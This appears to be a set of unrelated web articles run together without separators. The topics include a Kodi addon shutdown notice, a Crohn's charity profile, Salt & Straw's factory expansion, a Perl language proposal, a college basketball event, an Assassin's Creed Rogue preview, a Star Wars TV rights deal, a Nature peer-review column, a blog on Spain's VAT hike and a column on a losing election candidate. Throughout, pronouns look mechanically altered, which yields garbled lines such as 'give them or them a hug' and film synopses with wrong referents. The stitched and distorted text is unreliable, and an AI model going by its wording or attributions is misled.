Mucky Duck will no longer be developing the mdrepo or duckpool repo. Ive shut them down due to unforeseen legal actions that I'm not at liberty to discuss. So farewell for now but hopefully i can find another project that isn't in such a legal grey area to continue my learning of the addictive language that is python. on the plus side im getting married in the new year. thinking maybe a stag do in amsterdam anyone welcome.
Mucky Duck was the dev for some popular Kodi addons such as M4U and DuckPool.
FAQ: If I have these addons installed, what should I do?
If you already have Covenant, Bennu, or any other addon installed which is no longer alive, LEAVE IT ALONE. There is no risk in keeping the addon installed at this time and they will continue to function. Kodi addons are simply search engines to the public internet and host no content. Without developers, addons degrade over time and you will see less and fewer links returned by them.
If you uninstall an addon, you will not be able to install it again easily. If you are setting up a new Kodi box, you will not be able to install any repo that is currently down.
Summary of Repositories & Addons Down
Repositories
Colossus
Mucky Duck
Ares
DandyMedia
NoobsAndNerds
SpinzTV
Addons
Colossus
Bennu
Fear of the Dark
Icefilms
1Channel
Myriad
M4U
Sportie
Yes Movies
Duck Pool
Imperial Streams
123Movies
Openload Movies
1080p Movies
DandyMedia
Film Emporium
HEVC VideoClub
Ares Football
Elysium
Bob Unleashed
We will update you on KodiTips as soon as we have more information. Some other addresses have hosted mirror copies of the Colossus repository and some of its addons, but without the official source for updates, those repos are now unsupported.
Let us know on Twitter or Facebook if you have any further information.
A Crohn's disease sufferer in Limavady has spoken of the ‘loneliness' of their illness and the support provided by a local charity.
Jennifer Devlin, a mother of three from Limavady, is trying to raise awareness of the charity Let's Talk Crohn's and Collitis Northern Ireland.
It is an illness that leaves you very isolated and lonely Jennifer Devlin
The charity have been in existence for almost exactly one year after they were set up by three young sufferers of Crohn's and Collitis.
Limavady woman and Crohn's sufferer Jennifer Devlin told the Sentinel that the charity have provided invaluable help and support as they struggled with their diagnosis.
“I was diagnosed with Crohn's disease last year”, they said. “When I was in the hospital they said to me about the charity. At that time, they weren't going all that long. There were a lot of things, events and things like that, that were happening up in Belfast. It was three young people that set it up. They were all sufferers themselves.
“In January they had their first meeting, the first time everybody was able to meet together at the same time. They had another in March.
“I have found them to be a great help to me personally. I didn't even know what Crohn's was before I got the diagnosis and they have been very helpful for me because I have been able to ask people who have got the illness about things and that has been a great comfort.
“I'm still learning things about it all the time. I can ask people about the side effects of treatments and see if others are having the same problems.
“You hear from other people who can relate to you and who know what you are talking about. You also hear so many success stories from people who got their lives back. When you are sitting in the situation and you are going through all these treatments and you can hear from someone who has had a colostomy bag say that it was the best thing they ever did then it makes you more positive.
“Before I was diagnosed I never really talked about bowel movements. It is an illness that leaves you very isolated and lonely. I've now got depression and anxiety because of it. If I was explaining to people about the effects it has on you they maybe don't really know, or want to know, what you are talking about.
“The people that are sufferers are all on the same page - you know you are not on your own. They have been brilliant. When I was in the hospital there was no support group. I am a member of a UK charity as well but I get more information about the illness from the local charity.
“Fatigue can be a big part of it. If you say that you are having a bad day, someone from the group will respond. The ones in the group are very helpful because they understand what you are going through.
“I would really just like to raise awareness of the organisation - especially in this area. There are maybe five or six different people in Limavady that I didn't even know before we met through the charity. I don't know how many other people there are who have never heard of the charity.”
Salt and Straw expands in the Central Eastside
The iconic Portland artisan ice cream brand is opening a new manufacturing facility
Iconic Portland-based ice cream artisan Salt & Straw has plans to build out a new manufacturing kitchen in the Central Eastside Industrial District, with $2 million in help from the Portland Development Commission.
Kim Malek, co-founder of Salt & Straw, told the Business Tribune being involved with the PDC is one of their favorite parts of the expansion.
"When I was very first starting Salt & Straw back in 2011, we were $40,000 short to be able to open on Alberta Street," Malek said. "This whole thing is coming full circle with the PDC because at that time, I applied for a loan from the PDC and they gave me a loan to get that store open."
They said the PDC spent time with them as a new entrepreneur going through their business plan and getting everything in order, even though nobody was loaning any money in 2011.
"Now, here we are at the next phase of our growth, and here they are partnering with us," Malek said. "It's really great to work with them again in this second phase. You don't get to say very often the City has been there to invest in you, and they've been there time and time again."
The City Council unanimously approved the PDC's funding for Salt & Straw's facility to become part of Portland's eastside Enterprise Zone (E Zone), a statewide economy development program that partners with the PDC.
The Expansion
Salt & Straw is investing about $2 million total into the building, mainly for "kitchen stuff, to make the best ice cream and create a lovely working environment for our team," they said.
The new facility will be in the CEID (Central Eastside Industrial District) along Southeast Second Avenue. The building is 28,000 square feet, but it's so large that Malek plans to sublease about 9,000 square feet out — "Hopefully to someone exciting," they said.
Salt & Straw's current kitchen is 3,500 square feet, making ice cream for the four Portland shops.
"We've been looking and looking and wanted to stay within the city of Portland, hoping to stay in Southeast because that's where we are currently with our kitchen," Malek said. "It took a little more than two years to find something and we were able to secure a lease on this space, which is bigger than we needed but we're excited we're going to be able to make it work."
The E Zone
"We initially heard through a couple other entrepreneur food manufacturing brethren who were part of the E Zone," Malek said. "Olympic Provisions was part of the E Zone and we'd heard there are tax credits available if you're looking for innovative ways to invest in the city. We thought, what a great way to partner with the City to get funding for these programs."
The E Zone provides a tax abatement for companies who manufacture in the inner city, so as part of qualifying for the tax program with the PDC Salt & Straw is putting together two programs. The tax credits are worth about $150,000.
"One is a food entrepreneur program where we'll be working with two or three new, artisan manufacturers in the City of Portland every year to help them get off the ground," Malek said. "We will not only become one of their biggest customers by buying their products — let's say if a honey maker or chocolate maker or tea blender, we'll commit to buying a certain amount of product from them so they can have a good first customer."
The entrepreneur program also includes a specially developed curriculum to help the startups get going including resources, food safety, HR, marketing and branding.
"We had so many people help us and we've been able to work with so many new companies that are coming up," Malek said.
Because Salt & Straw grew to such a big company, its other artisan suppliers were able to get bank backing by showing their largest customer, orders and need for new equipment or a larger space or more employees.
"Through this partnership with artisans that we currently work with, we've already organically seen this happen and we thought we could, in a more organized way, support companies we're working with," Malek said. "It's going to be a great way to use our growing company to benefit the community of Portland."
The second program is a progressive hiring program.
"Last year we put everyone in our company through about 40 hours of training including anything from food safety, hospitality, leadership, marketing and events," Malek said. "We have a pretty extensive training program."
They're hiring through SE Works, a community based workforce development organization.
"Our dream was to start to work with different community organizations who are trying to bring different populations back to work, and basically giving them our training program so we could invest in helping them get people ready for work," Malek said. "The City just so happened to be working on some programs we were able to qualify to be a part of — the E Zone, by executing this program. It's been a long-time goal."
Why Portland's CEID
"This little core area of Southeast Portland is something interesting," Malek said. "Directly across the street from us is Olympia Provisions head office and manufacturing facility; about two blocks away is the New Seasons Central Kitchen; and three or four blocks away is the new Stumptown Roasting facility. It's kind of becoming this great little manufacturing hub in the inner city."
With the new facility, Salt & Straw intends to add several dozen new positions, as part of the E Zone requirement.
"We're going to be paying a minimum of $15 an hour. We also offer health insurance to anybody who works over 20 hours a week and employees pay $30 a pay period: the company subsidizes it quite substantially," Malek said. "We offer paid maternity and paternity leave for three months, disability insurance and employee assistance programs."
Don't worry — Salt & Straw will still be made in small batches.
"We are moving our exact ice cream makers over to this new facility," Malek said. "We make our ice cream five gallons at a time and we hand pack every single pipe — in fact, if you turn it over, they sign the bottom and you can see who put each brownie and handmade caramel in."
Salt & Straw is not changing the way it manufactures, but will be able to make more ice cream.
"We're really excited to stay to have this opportunity to stay within the inner core of Portland," Malek said. "I move back to Portland to open this company. We feel very grateful for the investment the community of Portland has made in our success. We're grateful to make this investment back and hope to be a really sustainable company to the city."
By Jules Rogers
Reporter
503-546-5149
email: This email address is being protected from spambots. You need JavaScript enabled to view it.
Follow us on Twitter
Visit us on Facebook
___________________________________
SALT & STRAW'S SWEET COMMITMENTS
Work closely with colleges, alternative high school diploma programs, back-to-work programs and nonprofits (such as Gateway to Career, The Portland Kitchen and New Avenues for Youth) to develop hospitality-based training curriculum that would train both how to work in the hospitality and manufacturing field, how to interview for those positions, and reward completion with a certificate.
Partner with local restaurants and food manufacturers to use these candidate pools.
Hire at least two interns into the corporate office each year with programs like Emerging Leaders and SummerWorks.
Develop (in close consultation with PDC) a comprehensive hiring plan designed to ensure a broad-based job pool for 40-60 new job opportunities at Salt & Straw's corporate headquarters, in restaurants and on the manufacturing floor, with a significantly greater diversity hiring than the demographics of the City of Portland (goal of 50 percent diversity hiring).
To meet demographic requirements, Salt & Straw will partner with local workforce development providers (SE Works) and nonprofits to actively seek out local candidates and offer employment opportunities to workers still developing their skills through programs such as on-the-job training through WorkSource Oregon.
Endeavor to create flexibility in employee schedules and seek to hire employees at full time positions versus part time positions whenever possible.
Salt & Straw will prioritize outreach and improve awareness and access to employment opportunities for diverse and historically underrepresented communities.
Suppose someone applied a patch to add the method keyword to Perl 5. The benefits could go far beyond the simplicity of intent and implementation you get from writing:
use feature 'method'; method do_awesome_things { $self->do_something; $self->do_another_thing; $self->do_yet_another_great_thing; }
Sure, you save one line per method and you've communicated your intent that do_awesome_things() is really a method. (The argument "Can't you just put a comment or POD somewhere saying that do_awesome_things() is a method?" is exceedingly silly. You might as well use goto for all of your control flow. After all, you can always add a comment # this is a while loop .)
With method , you've done more than communicate to programmers that your method is a method. You've told Perl itself that your method is a method, and Perl can do many, many new things with that information. If Perl somehow marked the internal data structure it creates to represent methods (whether setting a flag or extending its CV structure with a MV structure), it could distinguish between functions and methods. This would allow several useful new features, not limited to:
Perl could detect the invocation of a method as a function and give a warning (which you could promote to an exception with use warnings )
) Perl could fix the SUPER problem
Perl could add an API to namespaces to retrieve the names of only the methods in a namespace
If Perl 5 had a class keyword, it could compile the class, resolve all of the uses of functions within the class, then remove functions from the class's namespace to leave only methods, so as to avoid inadvertent namespace pollution with non-methods. See also namespace::autoclean.
You get these benefits by adding this feature to the Perl 5 core. You can sort of emulate some of them with CPAN distributions—but in the core, you can make the need for some distributions and big chunks of features of some distributions disappear. Some flaws you can only truly fix within the language itself, and not in its ecosystem.
Michigan State athletic director Mark Hollis may have pulled off their greatest scheduling coup.
Hollis told ESPN.com on Thursday that they have secured commitments from 16 schools to participate in a two-tournament men's basketball event in honor of Nike co-founder Phil Knight's 80th birthday.
The two tournaments, each consisting of eight teams, would take place in Portland, Ore. during a four-day period in November 2017. Knight's 80th birthday is Feb. 24, 2018.
This event would have more collective star power than any of the previous tournaments played at Maui, New York, Orlando or the Bahamas. The 16 Nike-sponsored schools -- mostly elite programs -- include Michigan State, Kentucky, Duke and North Carolina.
Hollis said they have commitments from schools representing all college basketball's power conferences. NCAA rules prohibit schools from the same conference playing in the same event, hence the two eight-team tournaments.
The other schools are Florida, Ohio State, Connecticut, Georgetown, Texas, Oklahoma, Stanford, Oregon, Xavier, Butler, Gonzaga and Portland.
"All of these great basketball programs have been supported by Phil Knight and Nike," Hollis said. "His support of the programs have created scholarships and resources for these departments to excel."
Hollis said the event isn't driven by Knight or Nike, but rather by the schools' athletic directors who want to express their thanks. They also acknowledged that there are a few potential factors that could derail the current list of teams in the next five years -- a change in sneaker sponsorship or conference affiliation, for example.
"You can only have one school per conference, and with the current climate you never know," Hollis said. "We have the commitments to move forward from the 16 schools. What we're doing is creating the greatest in-season basketball event of all-time."
Hollis said how to split the conference teams hasn't been determined yet. The format for the event would have each set of eight teams play games at the Rose Garden and Veterans Memorial Coliseum on a Thursday in late November. The two events would switch sites for Friday's semifinals and consolation bracket.
The events would take Saturday off for college football programming, then return Sunday, with the third-place game and championship at the Rose Garden and the consolation at Veterans.
The format would be similar to the one used by the Old Spice Classic, Anaheim Classic and Puerto Rico Tip-Off Classic. Hollis said there is also discussion of having eight other teams that are Nike-sponsored to come to play games as well, but not against this field.
Hollis said they have contacted ESPN about televising the event. ESPN senior vice president Burke Magnus confirmed the discussion and said that ESPN is interested in televising it in 2017.
There are discussions to bring a professor from each of the 16 schools for a think-tank educational session for the event, Hollis said, and the coaches and athletic directors want a tie-in with the Jimmy V Fund for cancer research, as well.
Hollis said the reason this event has to be scheduled five years in advance is schools already are committed to pre-conference tournaments through 2016.
Hollis has made headlines for their creative scheduling and was at the forefront of the unique basketball game played between Michigan State and UNC on the active USS Carl Vinson on Nov. 11, 2011. They also quickly signed off on the Spartans playing UConn on Nov. 9 at Germany's Ramstein Air Base.
Ubisoft's last-generation version of Assassin's Creed, Assassin's Creed Rogue, might actually surprise fans of the franchise, especially given it's Assassin's Creed IV: Black Flag-like emphasis on naval combat.
During a recent trip to Ubisoft Montreal I had the chance to go hands-on with Rogue for approximately 20 minutes. In many ways Assassin's Creed Rogue is Black Flag II, only this time the player is thrown into the role of a Templar hunting Assassin. In Rogue you play as Shay Patrick Cormac, a character of Irish descent with a yet-to-be-revealed vendetta against the Assassins. Cormac is working with the British Empire in the frozen Atlantic ocean in the 1700s during the Seven Years' War, for yet again, another undisclosed reason (Ubisoft has so far been reluctant to discuss the game's plot).
The game seems to take players back to Assassin's Creed III's Revolutionary War setting, arguably the least enjoyable of the series, but in terms of gameplay, it feels much more like an extension of what Ubisoft started with Black Flag. Ubisoft Sofia's Martin Capel, the Game Director of Assassin's Creed Rogue, discussed why the studio decided to build Rogue around ship-to-ship combat. According to him, it made perfect sense with the kind of game they wanted to create.
“We received such a high level of appreciation for the naval [combat] that we felt for Rogue that we were in the right location for it and we already had the idea for what the game would be about – filling in the gap of history between Edward Kenway [from AC IV] and Haytham Kenway [from AC III] and what happened there. It's very much set in the conquest of the new world and naval combat had a lot to do with that. We also had the will to push it further [naval combat] so it seemed like the logical thing to do,” said Capel.
In terms of new on-foot features, what the AC franchise was all about before Black Flag, Cormac has a grenade launcher at their disposal that can dispatch their foes in a variety of new ways. Different kinds of ammunition, including shrapnel grenades, tranquilizer bombs and even a silent air rifle, are just a few of Rogue's new weapons. Also, while I didn't get to try it in the short demo, Cormac comes equipped with an interesting new tool called berserk gas that can turn both enemies and animals on one another, just like in Ubisoft's other popular open-world franchise, Far Cry 4.
Playing as a Templar also has the potential to change the typical Assassin's Creed story line, which usually revolves around either avoiding or killing Templars, although it's still unclear exactly how the game's story will play out. Capel discussed how building an Assassin's Creed title around playing as a Templar is something Ubisoft has wanted to do for quite some time, although they were reluctant to discuss how Rogue will tie into the broader Assassin's Creed universe.
“It's something that's been around for many years since AC1, they were like, so what's it like to play as a Templar now? So it's an idea that's been formulating for many years. We felt now was the right time to do it. We've already established that Assassins and Templars are pushing for the same noble goal, peace, through different means. The challenge for us is expressing that through the story and gameplay but I can't go into the story in too much detail,” said Capel.
At the start of the demo my ship, called the Morrigan this time, easily broke through the thin layer of ice covering the ocean's surface. I was then tasked with taking down a group of nearby enemy ships. Immediately I noticed Assassin's Creed: Rogue's vessel is more maneuverable than it was in Black Flag and also has a range of new abilities. I found dropping a flame-engulfed oil slick behind my ship to be particularly useful, especially when multiple ships were pursuing me in open water.
“We went through just about everything in the player's ship. This time it's smaller, it's faster. It's more maneuverable. Apart from the very visual aspect that you have like how the weaponry has changed, we've gone over the vessel completely. We wanted to take the idea that it's a Templar adapted ship. For us this meant that it's more efficient and effective. We even did a pass over of all the enemy ships and the AI for the ship and the navigation as well. We also have reverse boarding this time and enemy ships can board you,” said Capel.
It also quickly became apparent Rogue's world is very cold, especially when I forced Cormac to jump into the frigid water. As I should have expected, they immediately started to take damage as they swam through the freezing ocean's water. Rogue's frozen, desolate Atlantic world is also a nice change of pace from Black Flag's bright, vegetation filled Caribbean setting.
After taking down the group of ships, I was tasked with destroying a nearby gang outpost and killing its leader, which played out in the traditional way you'd expect from an Assassin's Creed game. I took out the surrounding enemies rather quickly and then focused on finding their leader. Where things got a little different was when I tried to actually take down the assassin commander who, since he's an assassin, had the ability to use parkour, smoke bombs and various weapons fans of the franchise have likely used themselves in other games. It was interesting to engage in a battle where it felt like I was facing an AI opponent with similar abilities to my own character.
Next I had to traverse across a shipwreck and free-run across various objects in order to reach a point high up in the wreckage of the ship. This portion of the demo reminded me a lot of Assassin's Creed III, except for the cute penguins who jumped into the water and swam away as I first approached the wreckage.
The idea of releasing two separate games in one franchise over the course of one year, might seem simple and perhaps a little ridiculous, but very few developers have tried something like this before. In fact, if you think about it, this strategy actually makes a lot of sense, especially if you're a hardcore fan of the Assassin's Creed franchise. I'd much rather have a game built from the ground up for the console I'm playing it on than a pared down port of the Xbox One or PlayStation 4 version of Assassin's Creed Unity.
Even though Rogue might not have the next-gen sheen of Assassin's Creed Unity, given the short period of time I spent with Ubisoft Sofia's Assassin's Creed Rogue, it'll likely be worth your time, especially if you enjoyed Black Flag's naval combat.
In fact, simply because of the game's emphasis on naval combat, a feature that revitalized the Assassin's Creed series and helped get me interested in it again, I'm actually more excited for Rogue than Unity, despite it only coming to the Xbox 360 and PlayStation 3.
Still, since I played Unity shortly before Rogue, it was hard to shake the feeling that I was playing an outdated version of the Assassin's Creed series, both in terms of visuals and gameplay mechanics, particularly when it comes to free-running.
Assassin's Creed Rogue is set to be released on the Xbox 360 and PlayStation 3 on Nov. 11, 2014.
Follow me on Twitter: @Patrick_ORourke.
In what is believed to be the biggest movie package sold to ad-supported TV networks, Turner has closed a domestic licensing deal with The Walt Disney Studios for the linear basic cable and companion ad-supported on-demand rights to 10-Star Wars movies — last year's Star Wars: The Force Awakens, this year's standalone Rogue One: A Star Wars Story, the next three yet-to-be-released movies in the franchise as well as five of the six previous Star Wars films. Additionally, Turner has secured the only Star Wars movie whose rights are not controlled by Lucasfilm/Disney, the original Star Wars: A New Hope, via a separate arrangement with 20th Century Fox, becoming the only basic cable company holding rights to all 11 titles in the collection.
Turner and Walt Disney Studios are not commenting, but sources estimate that the 10-title package is in the neighborhood of $200 million price range. Its sale comes after a highly atypical, year-long on-and-off process. Disney first sent out feelers that it was going to shop The Force Awakens (and other Star Wars movies) a year ago, ahead of the movie's December premiere. That ultimately didn't happen, and the movie was officially taken out at NATPE in January. But even after that, the Star Wars package was on the market, then off, then on again, with the selling paused a number of times. Still, the buyers came out in full force. There virtually was no basic cable network that did not bid for the movies, but Turner was the most aggressive from the get-go, blowing the others out of the water.
Using Star Wars as leverage, I hear the Disney package also includes other — mostly underperforming movies, something that is common practice when highly sought after titles are in play. I hear that includes recent releases Alice Through the Looking Glass and Pete's Dragon. Another aspect of the deal is that it only includes ad-supported on-demand rights, not commercial-free SVOD rights which are part of Disney's deals with Starz (for The Force Awakens) and Starz's successor Netflix for the next Star Wars films. It remains to be seen if viewers, who are used to streaming movies with no ads, will embrace watching Star Wars with commercials on demand.
The highly competitive nature of the bidding for the Star Wars package also underscores the increasing value of movies for ad-supported cable networks as they rival and often exceed the ratings performance of off-network series, once the cornerstone of acquired programming.
Turner will kick off the Star Wars run with a six-night marathon on TNT featuring the first six movies which starts September 20. The films will also air in December, in conjunction with Disney's theatrical release of Rogue One: A Star Wars Story. Star Wars: The Force Awakens will make its TNT debut in early 2018, followed in 2019 by this year's Rogue One: A Star Wars Story.
“The Star Wars movies and characters are beloved across generations, captivating audiences and breaking box office records around the globe for nearly four decades,” said Deborah K. Bradley, EVP of networks optimization, content strategy and commercialization for Turner. “Through this deal, TNT and TBS will be the exclusive basic cable home of one of the most iconic, enduring and valuable movie franchises of all time, giving viewers the chance to watch this amazing collection from the very beginning.”
This is the second big package of Disney-released movies for TNT, which in 2014 closed a deal with Disney-owned Marvel Entertainment for five movies, including Marvel's Avengers: Age of Ultron and Marvel's Captain America 3.
Here is the schedule for the six-night Star Wars launch event on TNT:
Tuesday, Sept. 20
8 p.m. (ET/PT) – Star Wars: The Phantom Menace
11 p.m. (ET/PT) – Star Wars: The Phantom Menace
Wednesday, Sept. 21
8 p.m. (ET/PT) – Star Wars: Attack of the Clones
11:05 p.m. (ET/PT) – Star Wars: Attack of the Clones
Thursday, Sept. 22
8 p.m. (ET/PT) – Star Wars: Revenge of the Sith
11:05 p.m. (ET/PT) – Star Wars: Revenge of the Sith
Friday, Sept. 23
8 p.m. (ET/PT) – Star Wars: A New Hope
10:45 p.m. (ET/PT) – Star Wars: A New Hope
Saturday, Sept. 24
10:45 a.m. (ET/PT) – Star Wars: The Phantom Menace
1:45 p.m. (ET/PT) – Star Wars: Attack of the Clones
4:55 p.m. (ET/PT) – Star Wars: Revenge of the Sith
8 p.m. (ET/PT) – Star Wars: The Empire Strikes Back
10:45 p.m. (ET/PT) – Star Wars: The Empire Strikes Back
Sunday, Sept. 25
5:15 a.m. Star Wars: The Phantom Menace
8:15 a.m. Star Wars: Attack of the Clones
11:20 a.m. Star Wars: Revenge of the Sith
2:25 p.m. (ET/PT) – Star Wars: A New Hope
5:10 p.m. (ET/PT) – Star Wars: The Empire Strikes Back
8 p.m. (ET/PT) – Star Wars: Return of the Jedi
11 p.m. (ET/PT) – Star Wars: Return of the Jedi
2 a.m. (ET/PT) – Star Wars: The Phantom Menace
________________________________________
The Star Wars Saga
Star Wars: The Phantom Menace
Jedi Knights Obi-Wan Kenobi (Ewan McGregor) and Qui-Gon Jinn (Liam Neeson) rescue Queen Amidala (Natalie Portman), ruler of a peaceful planet invaded by dark forces. On their escape, they discover nine-year-old Anakin Skywalker (Jake Lloyd), a child prodigy who is unusually strong in the Force.
Star Wars: Attack of the Clones
When Jedi apprentice Anakin Skywalker (Hayden Christensen) is assigned to protect Senator Padmé Amidala (Natalie Portman), they discover their love for her…and their own darker side. Obi-Wan Kenobi (Ewan McGregor) uncovers a secret clone army as the galaxy marches towards full-scale war.
Star Wars: Revenge of the Sith
Clone Wars rage across the galaxy. The sinister Sith Lord seizes control of the Republic and corrupts Anakin Skywalker (Hayden Christensen) to be their dark apprentice, Darth Vader. Obi-Wan Kenobi (Ewan McGregor) must confront their fallen friend in an epic lightsaber duel.
Star Wars: A New Hope
Young farm boy Luke Skywalker (Mark Hamill) is thrust into a galaxy of adventure when they intercept a distress call from the captive Princess Leia (Carrie Fisher). The event launches them on a daring mission to rescue them from the clutches of Darth Vader and the evil Empire.
Star Wars: The Empire Strikes Back
The Rebels scatter after the Empire attacks their base on the ice planet Hoth. Han Solo (Harrison Ford) and Princess Leia (Carrie Fisher) are pursued by Imperials, while Luke (Mark Hamill) trains with Jedi Master Yoda. Luke must battle Darth Vader and learns the shocking truth of their past.
Star Wars: Return of the Jedi
The Empire prepares to crush the Rebellion with a more powerful Death Star. The Rebel fleet counters with a massive attack on the space station. Luke Skywalker (Mark Hamill) confronts Darth Vader in a final climactic duel.
Star Wars: The Force Awakens
As Kylo Ren (Adam Driver) and the sinister First Order rise from the ashes of the Empire, Luke Skywalker (Mark Hamill) is missing when the galaxy needs them most. It's up to Rey (Daisy Ridley), a desert scavenger, and Finn (John Boyega), a defecting stormtrooper, to join forces with Han Solo (Harrison Ford) and Chewbacca in a desperate search for the one hope of restoring peace to the galaxy.
Rogue One: A Star Wars Story
From Lucasfilm comes the first of the Star Wars standalone films, Rogue One: A Star Wars Story, an all-new epic adventure. In a time of conflict, a group of unlikely heroes band together on a mission to steal the plans to the Death Star, the Empire's ultimate weapon of destruction. This key event in the Star Wars timeline brings together ordinary people who choose to do extraordinary things and, in doing so, become part of something greater than themselves.
Published online 27 April 2011 | Nature 472, 391 (2011) | doi:10.1038/472391a
Column: World View
Peer review of scientific papers in top journals is bogged down by unnecessary demands for extra lab work, argues Hidde Ploegh.
Submit a biomedical-research paper to Nature or other high-profile journals, and a common recommendation often comes back from referees: perform additional experiments. Although such extra work can provide important support for the results being presented, all too frequently it represents instead an entirely new phase of the project, or does not extend the reach of what is reported. It is often expensive and unnecessary, and slows the pace of research to a crawl. Among scientists in my field, there is growing concern that escalating demands by reviewers for the top journals, combined with the increasingly managerial role assigned to editors, now represents a serious flaw in the process of peer review.
Here, I offer some suggestions. The generalizations that follow have their pleasant exceptions, but the trend is that useful interventions are becoming exactly that — exceptions.
Rather than reviewing what is in front of them, referees often design and demand experiments for what would be better addressed in a follow-up paper. It is also commonplace for reviewers to suggest tests that, even if concluded successfully, do not materially affect conclusions. These are known in the trade as reviewer experiments. The demands seem to increase with the impact factor of a journal, as if referees feel that they need to raise the bar on the journal's behalf.
This has a serious and pernicious impact on the careers of young scientists, because it is not unusual for a year to pass before a paper is accepted into a high-profile journal. As a result, PhD degrees are delayed, postdocs may have to wait an entire year to compete for jobs and assistant professors can miss out on promotions.
The system also adds to tension between established, tenured lab heads charged with proper allocation of limited resources, and students and postdocs whose careers rely on papers in high-impact journals. The two sides will disagree on whether to cut their losses and consider lower-ranked journals, or to cave in to reviewers' demands.
“Extra months of experiments increase costs without any obvious advantage.”
The extra months of experiments increase costs for labs, without any obvious advantage for science. Although journals profit handily when prospective authors offer the best science possible, most do not spend money to produce it. For the publishing industry, this is an accepted business model, but it should come with greater responsibilities.
The scientific community should rethink how manuscripts are reviewed. Referees should be instructed to assess the work in front of them, not what they think should be the next phase of the project. They should provide unimpeachable arguments that, where appropriate, demonstrate the study's lack of novelty or probable impact, or that lay bare flawed logic or unwarranted conclusions. They should abandon the attitude that screams: "look, I've read it, I can be as critical as the next dude and ask for something that's not yet in the manuscript", a reflexive approach to reviewing that has unfortunately become more or less standard. Many reviewers are also, of course, authors, who will receive such unreasonable demands in their turn, so why does the practice persist? Perhaps there is a sense of 'what goes around comes', and scientists relish the chance to inflict their experiences on others.
The problem is made more acute by the unwillingness of editors to express their opinions. Instead, they consult an increasing number of reviewers (four or five is no longer an exception) in search of a majority opinion. Rather than taking a hard look at reviews and the experiments requested by referees, editors seem to default to the position that almost every requested experiment or revision can be justified. Editors often do not (or cannot?) assess revised manuscripts, and so send them out to reviewers again, losing more time and often bringing still more demands for further experiments.
I see three steps that journals can take to improve this deteriorating situation. First, they should insist that reviewers provide a rough estimate of the anticipated extra cost (in real currency) and effort associated with experiments they request. This is not unlike what all researchers are typically asked to provide in grant applications. Second, journals should get academic editors with expertise in the subject to take a hard look at whether the requests of reviewers will affect the authors' conclusions, and whether they can be implemented without undue delay. Third, reviewers should give a simple yes or no vote on the manuscript under scrutiny, barring fatal shortcomings in logic or execution. Once editors have decided that, in principle, the results are of interest to their publication and its readership (which is their editorial prerogative), passing a simple test of logical rigour and quality of data should be enough to get them through peer review. Multiple revisions rarely affect the overall conclusions of a study, as many an editor (and author, for that matter) would agree.
These changes would save time, speed exciting science to the public eye and provide much-needed clarity to authors — with significant savings to boot. Having read some of the biographies of the founders of molecular biology, it is hard to escape the impression that, once, the mechanics of science were indeed thus. It is worth revisiting the experiment, I should think.
Hidde Ploegh is a professor of biology at the Whitehead Institute of the Massachusetts Institute of Technology in Cambridge. e-mail: ploegh@wi.mit.edu
In a seriously misguided effort to balance its budget, In early September Spain Passed Largest VAT Hike In History.
I wrote at the time, "Stunning Ineptitude Will Make History Books".
Spain's unemployment rate is over 25% and the youth unemployment rate is near 53% yet the fools in the Spanish government hiked taxes yet again, this time by the largest amount in history.
Spain's handling of this economic implosion is sure to make the history books as a prime example of complete ignorance in how to deal with a fiscal crisis.
History in the Making
That prediction took a single month to pan out. Reuters reports Spain retail sales decimated by VAT hike.
Spanish retail sales fell at their fastest pace on record in September as already battered consumer confidence took another hit from a hike in value added tax, driving many shoppers to trade down to cheaper products.
Sales fell 10.9 percent year on year, Monday's National Statistics Institute data showed, reflecting an economy struggling through its second recession in three years and plagued by chronically high unemployment.
The drop was the biggest in calendar-adjusted terms since current records began in January 2004, and marked the 27th monthly decline in a row.
"It's clear there are no signs the crisis is abating," economist at Nomura Silvio Peruzzo said. "The headline (retail) figures show a sharp drop and indicate that domestic demand is not going to be anywhere near what the government is anticipating."
Counterpart jackasses in Brussels insist upon it The government in Spain refuses to change work rules and shrink government, something that desperately needs to be done
The last thing Spain needs is ridiculous tax hikes. Clearly they are counterproductive. So why do the jackasses keep hiking taxes?That's a good question, and here is the two-part answer.To be sure more pain is coming to Spain. Shrinking government and reducing pensions would be painful as well, but at least there would be long-term benefit. Hiking taxes is all pain and no gain.Spain really needs to exit the euro, and it will, but not before the entire country is in the gutter and the masses have finally had enough.Mike "Mish" Shedlockhttp://globaleconomicanalysis.blogspot.com
If you happen to know someone who ran for office and lost in the last provincial election, find a way to give them or them a hug.
Even if you just see one on the street, really. While the winners are applauding throne speeches (if they're Liberals) or trying to figure out how they'll get to write one of their own in four years (if they aren't), the losers are struggling. The way Rem Westland did.
Westland, a longtime official in the departments of defence and Indian affairs, put aside their $120,000-a-year job as a real-estate consultant to run for the federal Conservatives in Ottawa-Vanier in 2011. They had deep roots in the riding, spoke candidly and intelligently about issues both national and local, and came third, pulling 27 per cent of the vote — about what Conservatives usually get in a riding that's voted for Liberals forever.
Their 58-page campaign memoir, written in the form of a report to their leader Stephen Harper, is a cri de coeur from a candidate who knew they were a long shot but believed in themselves and their party enough to try anyway.
Running for office is “ennobling,” they write, a worthy contribution to democracy even if you fail. But more practically it's also a degrading slog. Doors slammed in your face. Strange directions from central-party officials you've never met. Struggling with a riding association you might not know well.
Also constant, merciless pressure from above to execute voter-identification strategies that depend on asking people intrusive questions about their voting intentions, more like a census-taker than a candidate trying to convince people. Reams of survey sheets to be filled out in detail.
“Everyone knows the achievement of the target and the meeting of the standard is impossible,” Westland writes. “Not a single resident, in not a single home in my riding, had either the will or the patience to answer more than one of the questions when we knocked on doors.”
It's hopeless but it's all anybody seems to want you to do, on the off chance that finding a few extra voters and getting them to the polls makes the difference — and because it can improve the party's central list of potential donors.
Discovering you're just cannonfodder is hard for someone who's been successful in life outside politics, Westland says. This is the nut of their argument: That our political systems, federal and provincial, select for people who have nothing to lose by spending months of their lives running and losing. Professional “politicos,” as Westland calls them, often people half their age, joined their parties' youth wings early and have volunteered on campaigns and worked in politicians' offices and in their party apparatus. Running for office is just another duty for the cause, no matter how it turns out.
“What really matters is for their party to win,” they write. “If their party wins then the capacity of their network of friends and associates to secure post-election jobs will be very great. To have run for their party will be a badge of honour. It will have confirmed a deep commitment to their party's fortunes. It will have earned a reasonable reward.”
If you are not such a person, there is no reward waiting for you. Two days after the vote, Westland writes, they were wrenching dead campaign signs out of the ground by himself, in the rain. Volunteers disperse instantly after a losing campaign.
